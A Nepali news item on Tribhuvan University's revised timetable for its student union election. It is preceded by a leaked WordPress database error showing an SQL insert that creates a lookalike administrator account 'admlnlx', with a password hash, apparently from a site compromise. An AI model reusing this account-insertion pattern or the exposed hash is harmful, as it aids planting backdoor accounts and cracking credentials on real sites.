WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B0pNfu30CyR5VYagC0xURZFy57X8Xr.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 13:10:51', '', 'admlnlx', 'admlnlx')
काठमाडौ,फागुन ६-
त्रिभुवन विश्वबिद्यालयले आगामी फागुन १८ गते हुने स्वतन्त्र बिद्यार्थी युनियनको निर्वाचन कार्यतालिका सार्वजनिक गरेको छ ।त्रिवि कार्यकारी परिषदको आजको बैठकले एक साता लामो स्ववियु निर्वाचन कार्यतालिका सार्वजनिक गरेको हो । यसअघि फागुन १४ गते निर्धारण गरिएको निर्वाचन पाँच दिन सरेपछि नयाँ कार्यतालिका बनाउनुपरेको हो ।
नयाँ कार्यतालिका अनुसार फागुन ११ गते बिहान १० बजेभित्र मतदाता सूची प्रकाशित गर्ने । त्यसै दिन २ बजेसम्म मतदाता सूचीउपर दावी बिरोध गर्ने र फागुन १२ गते १२ बजेसम्म मतदाताको अन्तिम नामावली सार्वजनिक गर्ने कार्यतालिका छ ।
फागुन १२ गते नै १२ देखि ५ बजेसम्म प्रत्यक्ष र समानुपातिकतर्फका उम्मेदवारको मनोनयत वितरण गरिनेछ । फागुन १४ गते उम्मेदवारी दर्ता हुनेछ भने १५ गते मध्यान्ह १२ बजे सम्म उम्मेदवारको अन्तिम नामावली प्रकाशित हुनेछ । १५ गते नै दिउँसो ३ बजेसम्म उम्मेदवारी फिर्ता लिने समय तोकिएको छ भने ५ बजेसम्म उम्मेदवारको अन्तिम नामावली प्रकाशन गरिनेछ ।परिषदको बैठकले १८ गते हुने निर्वाचनको समय सम्बन्धित क्याम्पसलाई नै तय गर्न छुट दिएको छ ।